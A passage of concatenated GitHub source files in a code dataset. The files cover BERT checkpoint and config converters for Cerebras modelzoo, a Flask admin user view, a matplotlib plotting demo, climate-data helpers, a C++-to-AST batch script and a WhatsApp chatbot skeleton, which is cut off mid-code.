super().__init__()\n\n def pre_config_convert(\n self, config, from_index,\n ):\n config = super().pre_config_convert(config, from_index)\n if from_index == 1:\n if (\n \"pooler_nonlinearity\" in config\n and config[\"pooler_nonlinearity\"]\n != config[\"encoder_nonlinearity\"]\n ):\n raise ConfigConversionError(\n \"pooler_nonlinearity was introduced in CS 1.8. Prior to that, the pooler nonlinearity must be the same as encoder_nonlinearity\"\n )\n if \"mlm_nonlinearity\" in config:\n if config[\"mlm_nonlinearity\"] != \"gelu\":\n raise ConfigConversionError(\n \"mlm_nonlinearity was introduced in CS 1.8. Prior to that, the mlm nonlinearity must be gelu\"\n )\n else:\n if config[\"encoder_nonlinearity\"] != \"gelu\":\n raise ConfigConversionError(\n \"mlm_nonlinearity was introduced in CS 1.8. Prior to that, the mlm nonlinearity must be gelu. However, the input config has an mlm_nonlinearity which defaults to encoder_nonlinearity = {}\".format(\n config[\"encoder_nonlinearity\"]\n )\n )\n return config\n\n def post_config_convert(\n self,\n original_config,\n old_config,\n new_config,\n from_index,\n drop_unmatched_keys,\n ):\n if from_index == 0:\n new_config[\"pooler_nonlinearity\"] = new_config[\n \"encoder_nonlinearity\"\n ]\n new_config[\"mlm_nonlinearity\"] = \"gelu\"\n\n return super().post_config_convert(\n original_config,\n old_config,\n new_config,\n from_index,\n drop_unmatched_keys,\n )\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n\nclass Converter_Bert_CS17_CS18(BaseCheckpointConverter_PT_PT):\n def __init__(self):\n super().__init__()\n # Checkpoint didn't change between 1.7 and 1.8. Copy all keys.\n self.rules = [\n ConversionRule([\".*\"], action=self.replaceKey),\n ]\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"cs-1.7\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n @classmethod\n def converter_note(cls) -> str:\n return (\n \"BertForPreTraining, BertForSequenceClassification, \"\n \"BertForQuestionAnswering, and BertForSummarization classes\"\n )\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return ConfigConverter_Bert_CS17_CS18\n\n\nclass ConfigConverter_Bert_CS17_CS18(ConfigConverter_Bert_CS16_CS18):\n def __init__(self):\n # Config didn't change between 1.6 and 1.7. Therefore 1.7 <-> 1.8\n # converter is equivalent to 1.6 <-> 1.8 converter.\n super().__init__()\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"cs-1.7\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n\nclass Converter_BertModel_HF_CS17(\n Converter_BertModel_CS16_CS17, BaseCheckpointConverter_HF_CS\n):\n def __init__(self):\n super().__init__()\n\n def pre_model_convert(\n self,\n old_state_dict,\n new_state_dict,\n configs,\n from_index,\n drop_unmatched_keys,\n ):\n # Manually tie weights\n if from_index == 1 and configs[1][\"model\"][\"share_embedding_weights\"]:\n if (\n old_state_dict.get(\n \"bert_encoder.embedding_layer.word_embeddings.weight\", 0\n )\n is None\n ):\n old_state_dict[\n \"bert_encoder.embedding_layer.word_embeddings.weight\"\n ] = old_state_dict[\n \"bert_mlm_head.classifier.ffn.0.linear_layer.weight\"\n ]\n\n def post_checkpoint_convert(\n self, checkpoint, from_index: int,\n ):\n return BaseCheckpointConverter_HF_CS.post_checkpoint_convert(\n self, checkpoint, from_index\n )\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.7\"))\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return ConfigConverter_Bert_HF_CS17\n\n\nclass Converter_BertModel_HF_CS18(BaseCheckpointConverter_HF_CS):\n def __init__(self):\n super().__init__()\n self.rules = [\n # Catch checkpoints from Pytorch 2.0 API\n ConversionRule([Converter_BertModel_HF_CS17(),], action=None,),\n # Catch checkpoints from depricated PyTorchBaseModel\n ConversionRule(\n [EquivalentSubkey(\"\", \"model.\"), Converter_BertModel_HF_CS17()],\n action=None,\n ),\n ]\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return ConfigConverter_Bert_HF_CS17\n\n\nclass Converter_BertPretrainModel_CS16_CS17(BaseCheckpointConverter_PT_PT):\n def __init__(self):\n super().__init__()\n self.rules = [\n ConversionRule(\n [\n EquivalentSubkey(\"bert.\", \"bert_encoder.\"),\n Converter_BertModel_CS16_CS17(),\n ],\n ),\n # CLS:\n ConversionRule(\n [\n EquivalentSubkey(\n \"cls.predictions.transform.dense\",\n \"bert_mlm_head.mlm_transform.ffn.ffn.0.linear_layer\",\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"cls.predictions.transform.\",\n \"bert_mlm_head.mlm_transform.\",\n ),\n Converter_BertLayerNorm_HF_CS(\"LayerNorm\", \"ln\"),\n ],\n action=None,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"cls.predictions.decoder\",\n \"bert_mlm_head.classifier.ffn.0.linear_layer\",\n ),\n \"\\.weight\",\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"cls.predictions.decoder\",\n \"bert_mlm_head.classifier.ffn.0.linear_layer\",\n ),\n \"\\.bias\",\n ],\n action=self.convert_cls_predictions_bias,\n ),\n ConversionRule([\"cls\\.predictions\\.bias\"], exists=\"left\"),\n ConversionRule(\n [\n EquivalentSubkey(\n \"cls.seq_relationship\",\n \"bert_cls_head.classifier.ffn.0.linear_layer\",\n ),\n \"\\.(?:weight|bias)\",\n ],\n action=self.replaceKey,\n ),\n ]\n\n def convert_cls_predictions_bias(\n self,\n old_key,\n new_key,\n old_state_dict,\n new_state_dict,\n from_index,\n action_fn_args,\n ):\n self.replaceKey(\n old_key,\n new_key,\n old_state_dict,\n new_state_dict,\n from_index,\n action_fn_args,\n )\n if from_index == 1:\n # HF stores an extra copy of the decoder bias in the predictions object itself\n bias_key = re.sub(\"\\.decoder\\.\", \".\", new_key)\n self.replaceKey(\n old_key,\n bias_key,\n old_state_dict,\n new_state_dict,\n from_index,\n action_fn_args,\n )\n\n def post_checkpoint_convert(\n self, checkpoint, from_index: int,\n ):\n logging.warning(\n \"The Bert model changed significantly between {} and {}. As a result, the\"\n \" optimizer state won't be included in the converted checkpoint.\".format(\n *self.formats()\n )\n )\n return {\"model\": checkpoint[\"model\"]}\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.7\"))\n\n @classmethod\n def converter_note(cls) -> str:\n return \"BertPretrainModel class\"\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return ConfigConverter_Bert_CS16_CS17\n\n\nclass Converter_BertPretrainModel_CS16_CS18(BaseCheckpointConverter_PT_PT):\n def __init__(self):\n super().__init__()\n self.rules = [\n # Catch checkpoints from Pytorch 2.0 API\n ConversionRule(\n [Converter_BertPretrainModel_CS16_CS17(),], action=None,\n ),\n # Catch checkpoints from depricated PyTorchBaseModel\n ConversionRule(\n [\n EquivalentSubkey(\"\", \"model.\"),\n Converter_BertPretrainModel_CS16_CS17(),\n ],\n action=None,\n ),\n ]\n\n def post_checkpoint_convert(\n self, checkpoint, from_index: int,\n ):\n logging.warning(\n \"The Bert model changed significantly between {} and {}. As a result, the\"\n \" optimizer state won't be included in the converted checkpoint.\".format(\n *self.formats()\n )\n )\n return {\"model\": checkpoint[\"model\"]}\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"cs-1.6\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n @classmethod\n def converter_note(cls) -> str:\n return \"BertPretrainModel class\"\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return ConfigConverter_Bert_CS16_CS18\n\n\nclass Converter_BertPretrainModel_HF_CS17(\n Converter_BertPretrainModel_CS16_CS17, BaseCheckpointConverter_HF_CS\n):\n def __init__(self):\n super().__init__()\n\n def pre_model_convert(\n self,\n old_state_dict,\n new_state_dict,\n configs,\n from_index,\n drop_unmatched_keys,\n ):\n # Manually tie weights\n if from_index == 1 and configs[1][\"model\"][\"share_embedding_weights\"]:\n if (\n old_state_dict.get(\n \"bert_encoder.embedding_layer.word_embeddings.weight\", 0\n )\n is None\n ):\n old_state_dict[\n \"bert_encoder.embedding_layer.word_embeddings.weight\"\n ] = old_state_dict[\n \"bert_mlm_head.classifier.ffn.0.linear_layer.weight\"\n ]\n\n def post_checkpoint_convert(\n self, checkpoint, from_index: int,\n ):\n return BaseCheckpointConverter_HF_CS.post_checkpoint_convert(\n self, checkpoint, from_index\n )\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.7\"))\n\n @classmethod\n def converter_note(cls) -> str:\n return \"{} <-> {} for BertForPreTraining\".format(\n cls.formats()[0], cls.formats()[1]\n )\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return ConfigConverter_Bert_HF_CS17\n\n\nclass Converter_BertPretrainModel_HF_CS18(Converter_BertPretrainModel_HF_CS17):\n def __init__(self):\n super().__init__()\n self.rules = [\n # Catch checkpoints from Pytorch 2.0 API\n ConversionRule(\n [Converter_BertPretrainModel_HF_CS17(),], action=None,\n ),\n # Catch checkpoints from depricated PyTorchBaseModel\n ConversionRule(\n [\n EquivalentSubkey(\"\", \"model.\"),\n Converter_BertPretrainModel_HF_CS17(),\n ],\n action=None,\n ),\n ]\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n @classmethod\n def converter_note(cls) -> str:\n return \"{} <-> {} for BertForPreTraining\".format(\n cls.formats()[0], cls.formats()[1]\n )\n\n @staticmethod\n def get_config_converter_class() -> BaseConfigConverter:\n return ConfigConverter_Bert_HF_CS18\n\n\nclass ConfigConverter_Bert_HF_CS17(BaseConfigConverter_HF_CS):\n def __init__(self):\n super().__init__()\n self.rules = [\n # Embedding\n ConversionRule([\"vocab_size\"], action=self.replaceKey),\n ConversionRule(\n [\"position_embedding_type\"],\n action=self.convert_position_embedding_type,\n ),\n ConversionRule(\n [\"max_position_embeddings\"], action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"tie_word_embeddings\", \"share_embedding_weights\"\n )\n ],\n action=self.replaceKey,\n ),\n # Decoder Block\n ConversionRule([\"hidden_size\"], action=self.replaceKey,),\n ConversionRule(\n [EquivalentSubkey(\"num_attention_heads\", \"num_heads\")],\n action=self.replaceKey,\n ),\n ConversionRule([\"num_hidden_layers\"], action=self.replaceKey,),\n ConversionRule(\n [EquivalentSubkey(\"intermediate_size\", \"filter_size\")],\n action=self.replaceKey,\n ),\n ConversionRule(\n [EquivalentSubkey(\"hidden_act\", \"encoder_nonlinearity\")],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\"mlm_nonlinearity\"], action=self.assert_mlm_nonlinearity,\n ),\n ConversionRule(\n [\"pooler_nonlinearity\"],\n action=BaseConfigConverter.assert_factory_fn(1, \"tanh\"),\n ),\n ConversionRule(\n [EquivalentSubkey(\"hidden_dropout_prob\", \"dropout_rate\")],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\n EquivalentSubkey(\n \"attention_probs_dropout_prob\", \"attention_dropout_rate\"\n )\n ],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\"disable_nsp\"],\n action=BaseConfigConverter.assert_factory_fn(1, False),\n ),\n ConversionRule(\n [\"type_vocab_size\"],\n action=BaseConfigConverter.assert_factory_fn(0, 2),\n ),\n ConversionRule(\n [\"is_decoder\"],\n action=BaseConfigConverter.assert_factory_fn(0, False),\n ),\n ConversionRule(\n [\"add_cross_attention\"],\n action=BaseConfigConverter.assert_factory_fn(0, False),\n ),\n ConversionRule(\n [EquivalentSubkey(\"layer_norm_eps\", \"layer_norm_epsilon\")],\n action=self.replaceKey,\n ),\n ConversionRule(\n [\"attention_type\"],\n action=BaseConfigConverter.assert_factory_fn(\n 1, \"scaled_dot_product\"\n ),\n ),\n ConversionRule(\n [\"use_projection_bias_in_attention\"],\n action=BaseConfigConverter.assert_factory_fn(1, True),\n ),\n ConversionRule(\n [\"use_ffn_bias_in_attention\"],\n exists=\"right\",\n action=BaseConfigConverter.assert_factory_fn(1, True),\n ),\n ConversionRule(\n [\"use_ffn_bias\"],\n exists=\"right\",\n action=BaseConfigConverter.assert_factory_fn(1, True),\n ),\n ConversionRule(\n [\"use_ffn_bias_in_mlm\"],\n exists=\"right\",\n action=BaseConfigConverter.assert_factory_fn(1, True),\n ),\n ConversionRule(\n [\"use_output_bias_in_mlm\"],\n exists=\"right\",\n action=BaseConfigConverter.assert_factory_fn(1, True),\n ),\n ConversionRule([\"initializer_range\"], action=self.replaceKey),\n ]\n\n def convert_position_embedding_type(\n self,\n old_key,\n new_key,\n old_state_dict,\n new_state_dict,\n from_index,\n action_fn_args,\n ):\n\n # HF supports absolute, relative_key, relative_key_query\n # CS supports learned, fixed\n\n embed_type = old_state_dict[old_key]\n\n if from_index == 0:\n if embed_type == \"absolute\":\n new_state_dict[new_key] = \"learned\"\n else:\n raise ConfigConversionError(\n \"CS model doesn't support HF's position_embedding_type={}\".format(\n embed_type\n )\n )\n else:\n if embed_type == \"learned\":\n new_state_dict[new_key] = \"absolute\"\n else:\n raise ConfigConversionError(\n \"HF model doesn't support CS's position_embedding_type={}\".format(\n embed_type\n )\n )\n\n def assert_mlm_nonlinearity(\n self,\n old_key,\n new_key,\n old_state_dict,\n new_state_dict,\n from_index,\n action_fn_args,\n ):\n if old_state_dict[old_key] != old_state_dict[\"encoder_nonlinearity\"]:\n raise ConfigConversionError(\n \"HF model doesn't support different encoder & mlm nonlinearities\"\n )\n\n def pre_config_convert(\n self, config, from_index,\n ):\n config = super().pre_config_convert(config, from_index)\n\n defaults = [\n {\n \"vocab_size\": 30522,\n \"hidden_size\": 768,\n \"num_hidden_layers\": 12,\n \"num_attention_heads\": 12,\n \"intermediate_size\": 3072,\n \"hidden_act\": \"gelu\",\n \"hidden_dropout_prob\": 0.1,\n \"attention_probs_dropout_prob\": 0.1,\n \"max_position_embeddings\": 512,\n \"layer_norm_eps\": 1e-12,\n \"tie_word_embeddings\": True,\n },\n {\"share_embedding_weights\": True, \"encoder_nonlinearity\": \"gelu\",},\n ]\n\n # Apply defaults\n for key in defaults[from_index]:\n if key not in config:\n config[key] = defaults[from_index][key]\n\n return config\n\n def post_config_convert(\n self,\n original_config,\n old_config,\n new_config,\n from_index,\n drop_unmatched_keys,\n ):\n if from_index == 0:\n if \"enable_vts\" not in new_config:\n new_config[\"enable_vts\"] = False\n if (\n \"mlm_nonlinearity\" not in new_config\n and \"encoder_nonlinearity\" in new_config\n and new_config[\"encoder_nonlinearity\"] != \"gelu\"\n ):\n logging.warning(\n \"HF used a mlm_nonlinearity of {} while CS 1.7 is fixed to gelu. Please use CS 1.8 if you want to control mlm_nonlinearity\".format(\n new_config[\"encoder_nonlinearity\"]\n )\n )\n new_config[\"mlm_nonlinearity\"] = \"gelu\"\n\n return super().post_config_convert(\n original_config,\n old_config,\n new_config,\n from_index,\n drop_unmatched_keys,\n )\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.7\"))\n\n\nclass ConfigConverter_Bert_HF_CS18(ConfigConverter_Bert_HF_CS17):\n def __init__(self):\n super().__init__()\n\n @staticmethod\n def formats() -> Tuple[FormatVersions, FormatVersions]:\n return (FormatVersions(\"hf\"), FormatVersions(\"cs-1.8\", \"cs-1.9\"))\n\n def pre_config_convert(\n self, config, from_index,\n ):\n config = super().pre_config_convert(config, from_index)\n if from_index == 1:\n if \"pooler_nonlinearity\" not in config:\n if config[\"encoder_nonlinearity\"] != \"tanh\":\n raise ConfigConversionError(\n \"CS Model used a pooler_nonlinearity of {} according to encoder_nonlinearity. HF only supports tanh in the pooler nonlinearity\".format(\n config[\"encoder_nonlinearity\"]\n )\n )\n return config\n\n def post_config_convert(\n self,\n original_config,\n old_config,\n new_config,\n from_index,\n drop_unmatched_keys,\n ):\n if from_index == 0:\n new_config[\"pooler_nonlinearity\"] = \"tanh\"\n if \"mlm_nonlinearity\" not in new_config:\n new_config[\"mlm_nonlinearity\"] = new_config[\n \"encoder_nonlinearity\"\n ]\n\n return super().post_config_convert(\n original_config,\n old_config,\n new_config,\n from_index,\n drop_unmatched_keys,\n )\n","repo_name":"Cerebras/modelzoo","sub_path":"modelzoo/common/pytorch/model_utils/checkpoint_converters/bert.py","file_name":"bert.py","file_ext":"py","file_size_in_byte":31297,"program_lang":"python","lang":"en","doc_type":"code","stars":747,"dataset":"github-code","pt":"77"} +{"seq_id":"29913243248","text":"\"\"\"\n arghelper\n Intended to provide some helper functions for parsing arguments.\n\"\"\"\nimport os\n\n# Checks whether an argument is a valid file\n# Source: http://codereview.stackexchange.com/questions/28608/checking-if-cli-arguments-are-valid-files-directories-in-python\ndef is_valid_file(parser, arg):\n if not os.path.isfile(arg):\n parser.error('The file {} does not exist!'.format(arg))\n else:\n # File exists so return the filename\n return arg\n\ndef generate_argparse(parser):\n # Required\n parser.add_argument(\"messages_file\",\n help=\"path to your Facebook generated messages file\",\n type=lambda x: is_valid_file(parser, x))\n\n # Optional\n parser.add_argument(\"-o\", \"--out\",\n help=\"desired output file for PNG of word cloud\")\n","repo_name":"iconix/fb-chat-rnn","sub_path":"fb_chat_rnn/arghelper.py","file_name":"arghelper.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40412614408","text":"#!/usr/bin/env python3\n# -*- coding=utf-8 -*-\n# test for python code\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(-3,3,50) # 定义范围以及个数\n#print(x)\n#y = 2*x+1\ny=0.1*x\n#y1 = 2*x+1\n#y2 = x**2\n\nplt.figure()\n#plt.figure(num=1,figsize=(8,5),)\n#plt.figure(num = 3,figsize = (8,5)) # 单独的小窗口,num编号,figsize大小\n\n# 设置坐标轴-基本\n#plt.xlim((-1,2)) # 设置x坐标轴范围\n#plt.ylim((-2,3)) # 设置y坐标轴范围\nplt.ylim(-2,2)\n#plt.xlabel('I am x') # 设置x坐标轴名称\n#new_sticks = np.linspace(-1,2,5)\n#plt.xticks(new_sticks) # 设置x轴刻度\n#plt.ylabel('I am y') # 设置y坐标轴名称\n#plt.yticks([-2,-1.8,-1,1.22,3],[r'$really\\ bad$',r'$bad$',r'$normal$',r'$good$',r'$really\\ good$']) # 设置x轴刻度\n\n# 设置坐标轴-修改位置\nax = plt.gca() # 获取当前坐标轴信息\nax.spines['right'].set_color('none') # 设置边框,右侧;设置边框颜色:默认白色\nax.spines['top'].set_color('none')\nax.xaxis.set_ticks_position('bottom') # 设置x坐标刻度数字或名称的位置:bottom(所有位置:top、bottom、both、default、none)\nax.spines['bottom'].set_position(('data',0)) # 设置边框位置:y = 0的位置(位置所有属性:outward、axes、data)\nax.yaxis.set_ticks_position('left')\nax.spines['left'].set_position(('data',0))\n\n# 设置坐标轴-tick能见度\nfor label in ax.get_xticklabels() + ax.get_yticklabels():\n label.set_fontsize(12) # 重新调节字体大小\n # 在plt 2.0.2或更高的版本中,设置zorder给plot在z轴方向排序\n label.set_bbox(dict(facecolor='white',edgecolor='None',alpha=0.7,zorder=2)) # bbox:设置目的内容的透明度相关参数:{facecolor:调节box前景色,edgecolor:设置边框(本处设置边框为无),alpha:设置透明度}\n# Legend添加图例\n#l1,=plt.plot(x,y1,label='linear line') # l1结尾加逗号:plt.plot()返回的是一个列表\n#l2,=plt.plot(x,y2,color = 'red',linewidth = 1.0,linestyle = '--',label='square line') # color曲线颜色,linewidth线宽,linestyle线型,label图例名称\n#plt.legend(loc='upper right') # loc图例将添加在图中的右上角\n#plt.legend(handles=[l1,l2],labels=['up','down'],loc='best') # 'best':自动分配最佳位置,loc参数:{'best':0,'upper right':1,'upper left':2,'lower left':3,'lower right':4,'right':5,'center left':6,'center right':7,'lower center':8,'upper center':9,'center':10,}\n\n# Annotation标注\n#x0 = 1\n#y0 = 2*x0 + 1\n#plt.plot([x0,x0,],[0,y0,],'k--',linewidth=2.5)\n#plt.plot(x,y,)\nplt.plot(x,y,linewidth=10,zorder=1) # 在plt 2.0.2或更高的版本中,设置zorder给plot在z轴方向排序\n#plt.scatter([x0,],[y0,],s=50,color='b') # 设置点的样式\n# 用plt里面的annotation\n#plt.annotate(r'$2x+1=%s$' % y0,xy=(x0,y0),xycoords='data',xytext=(+30,-30),\n# textcoords='offset points',fontsize=16,\n# arrowprops=dict(arrowstyle='->',connectionstyle=\"arc3,rad=.2\"))\n# xycoords='data':基于数据的值来选位置,xytext=(+30,-30):对标注位置的描述,textcoords='offset points':对标注位置的xy偏差值,arrowstyle:对图中箭头类型的设置\n# 直接用plt里面的text\n#plt.text(-3.7,3,r'$This\\ is\\ the\\ some\\ text.\\mu\\ \\sigma_i\\ \\alpha_t$',\n# fontdict={'size':16,'color':'r'})\n# -3.7,3:选取text的位置,\\转义符:转义空格,fontdict设置文本字体\nplt.show()\n\n","repo_name":"miaoxiaozui2017/PythonDemoWithNotes","sub_path":"matplotlib-test/matplotlib-test01.py","file_name":"matplotlib-test01.py","file_ext":"py","file_size_in_byte":3427,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73021278648","text":"from flask import (\n Blueprint,\n redirect,\n request,\n flash,\n url_for,\n render_template)\nfrom flask_login import login_required, current_user\nfrom sqlalchemy import text\n\nfrom todos.blueprints.user.decorators import role_required\nfrom todos.blueprints.user.models import User\nfrom todos.blueprints.admin.forms import (\n SearchForm,\n UserForm\n)\n\nadmin = Blueprint('admin', __name__,\n template_folder='templates', url_prefix='/admin')\n\n\n@admin.before_request\n@login_required\n@role_required('admin')\ndef before_request():\n \"\"\" Protect all of the admin endpoints. \"\"\"\n pass\n\n\n# Users -----------------------------------------------------------------------\n@admin.route('/users', defaults={'page': 1})\n@admin.route('/users/page/')\ndef users(page):\n search_form = SearchForm()\n\n sort_by = User.sort_by(request.args.get('sort', 'created_on'),\n request.args.get('direction', 'desc'))\n order_values = '{0} {1}'.format(sort_by[0], sort_by[1])\n\n search_query = request.args.get('q', '')\n\n paginate_users_query = User.query\n\n if search_query:\n paginate_users_query = paginate_users_query.filter(User.search(search_query))\n\n paginated_users = paginate_users_query \\\n .order_by(User.role.asc(), text(order_values)) \\\n .paginate(page, 20, True)\n\n return render_template('admin/user/index.html',\n form=search_form,\n users=paginated_users)\n\n\n@admin.route('/users/edit/', methods=['GET', 'POST'])\ndef users_edit(id):\n user = User.query.get(id)\n form = UserForm(obj=user)\n\n if form.validate_on_submit():\n if User.is_last_admin(user,\n request.form.get('role'),\n request.form.get('active')):\n flash('You are the last admin, you cannot do that.', 'error')\n return redirect(url_for('admin.users'))\n\n form.populate_obj(user)\n\n if not user.username:\n user.username = None\n\n user.save()\n\n flash('User has been saved successfully.', 'success')\n return redirect(url_for('admin.users'))\n\n return render_template('admin/user/edit.html', form=form, user=user)\n\n\n@admin.route('/users/bulk_delete', methods=['POST'])\ndef users_bulk_delete():\n ids = User.get_bulk_action_ids(request.form.getlist('bulk_ids'),\n omit_ids=[current_user.id])\n\n if len(ids):\n delete_count = User.bulk_delete(ids)\n\n flash('{0} user(s) were scheduled to be deleted.'.format(delete_count),\n 'success')\n else:\n flash('No users were deleted, something went wrong.', 'error')\n\n return redirect(url_for('admin.users'))\n","repo_name":"dev-rijan/flask-todo","sub_path":"todos/blueprints/admin/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2769,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"10365309103","text":"import numpy as np\nimport cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\n\n# Utilities for common ops\ndef area_avg(x):\n return x.weighted(np.cos(np.deg2rad(x.lat))).mean(('lat', 'lon'))\n\ndef calc_anom(x):\n xclim = x.groupby('time.month').mean()\n return x - xclim.sel(month=x.time.dt.month)\n\ndef plot_map(x, title, units, **kwargs):\n ax = plt.axes(projection=ccrs.PlateCarree())\n p = x.plot(ax=ax, transform=ccrs.PlateCarree(), cbar_kwargs=dict(label=units, orientation='horizontal'), **kwargs)\n ax.set_global()\n ax.coastlines()\n plt.title(title)\n return p\n\n","repo_name":"cmda-jpl/cmda_notebooks","sub_path":"cmda_utils.py","file_name":"cmda_utils.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"33611011351","text":"\"\"\"\ntransfer cpp file to ast file without include file\n\"\"\"\nimport json\nfrom progress import process_cpp_file\nimport threading\nimport time\nimport multiprocessing\n\n\ndef process_problem(problem_id, problem):\n print('start transfer problem %s-->%s acc cpp file to ast file without include file' % (\n problem_id, problem['title']))\n\n # travel acc\n count = 0\n for solution in problem['acc']:\n t = threading.Thread(target=process_cpp_file, args=(solution,))\n t.setDaemon(True)\n t.start()\n # sleep 5 sec per 100 thread start\n count += 1\n if count == 30:\n time.sleep(4)\n count = 0\n print('transfer problem %s-->%s acc cpp file to ast file without include file OK' % (problem_id, problem['title']))\n\n\n# init solution list\nwith open('./problem_types.json', 'r', encoding='utf-8') as f:\n problem_types = json.load(f)['problem_types']\n\n# travel problem\nfor problem_id, problem in problem_types.items():\n pool = multiprocessing.Pool(processes=4)\n pool.apply_async(func=process_problem, args=(problem_id, problem))\n pool.close()\n pool.join()\n\nprint('transfer all source code to ast tree OK')\n","repo_name":"fengjunhui/ProgramAnalysis-GGNN","sub_path":"cpp_to_ast.py","file_name":"cpp_to_ast.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"77"} +{"seq_id":"7300008304","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\nimport time\nimport re\nfrom functools import wraps, partial\nfrom webwhatsapi import WhatsAPIDriver\n\nimport emoji\n\n## TODO\n# define class error\n# \n\nclass Bot(object):\n '''\n This class' purpose is to provide chatbot core needs.\n '''\n \n def __init__(self, **kwargs):\n \"\"\"Initialises a new driver via webwhatsapi module\n \n @param client_id: ID of user client or botname\n @param profile_path: path to store user data\n @\n \"\"\"\n # Gather the most kwargs will used\n client_id = kwargs.get('client_id', 'wabot')\n profile_path = kwargs.get('profile_path', os.getcwd())\n\n # Create profile directory if it does not exist\n profile_path = os.path.join(profile_path + '/' + str(client_id))\n if not os.path.exists(profile_path):\n os.makedirs(profile_path)\n \n # Options to customize chrome window\n chrome_options = [\n 'window-size=' + kwargs.get('windows_size', \"910,512\"),\n '--user-agent=Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/60.0.3112.78 Chrome/60.0.3112.78 Safari/537.36'\n ]\n if kwargs.get('is_headless', True):\n chrome_options.append('--headless')\n if kwargs.get('is_disable_gpu', True):\n chrome_options.append('--disable-gpu')\n \n self.attributes = []\n self.properties = {}\n\n # Create a whatsapidriver object\n self.driver = WhatsAPIDriver(\n username=client_id, \n profile=profile_path, \n client='chrome', \n chrome_options=chrome_options\n )\n # super().__init__()\n \n def setup(self, **kwargs):\n for p,configs in kwargs.get('config').items():\n for c in configs:\n self.getattribute(p).setup(**c)\n\n def plugin(self, **kwargs):\n try:\n name = kwargs.get('name').split(\"/\")\n name = name[len(name) - 1]\n print('Loading Plugin {}'.format(name))\n sys.path.append(kwargs.get('path'))\n module = __import__(name)\n __class__ = getattr(module, name.title())\n instance = __class__(driver=self.driver)\n # print(\"attributes append {}\".format(name))\n self.attributes.append(name)\n self.setattr(name, instance)\n # print(str(self.getattribute(name)))\n except Exception as e:\n print(e)\n\n def getattribute(self, key):\n \"\"\"\n get bot's attribute\n \"\"\"\n if key in self.attributes:\n return self.properties[key]\n else:\n self.driver.quit()\n raise Exception(\"no {} attribute found\".format(key))\n\n def setattr(self, key, val):\n \"\"\"\n set bot's attribute\n \n @key : key like in dict data type\n @val : value for the key\n \"\"\"\n if key in self.attributes:\n self.properties[key] = val \n else:\n self.driver.quit()\n raise Exception(\"no {} attribute defined\".format(key))\n\n def run(self, **kwargs):\n driver = self.driver\n if not driver.is_logged_in():\n print(\"Waiting for login\")\n driver.wait_for_login()\n print(\"Bot started\")\n\n driver.subscribe_new_messages(MessageObserver(driver, **kwargs))\n print(\"Waiting for new messages...\")\n\n \"\"\" Locks the main thread while the subscription in running \"\"\"\n while True:\n time.sleep(kwargs.get('frameTime', 60))\n\nclass MessageObserver:\n def __init__(self, driver, **kwargs):\n self.driver = driver\n self.callbacks = kwargs.get('callbacks')\n print(locals())\n\n def on_message_received(self, new_messages):\n for message in new_messages:\n for fn in self.callbacks:\n fn(message)\n\nclass BotDecorator(object):\n class IsMagicWord(object):\n def __init__(self, k):\n self.k = k\n \n def __call__(self, f, *args, **kwargs):\n def wrapper(*args, **kwargs):\n try:\n if args[1].content.lower().find(self.k) == 0:\n # print(\"MagicWord is {}\".format(self.k)) \n f(*args, **kwargs)\n except Exception as e:\n print(e)\n return 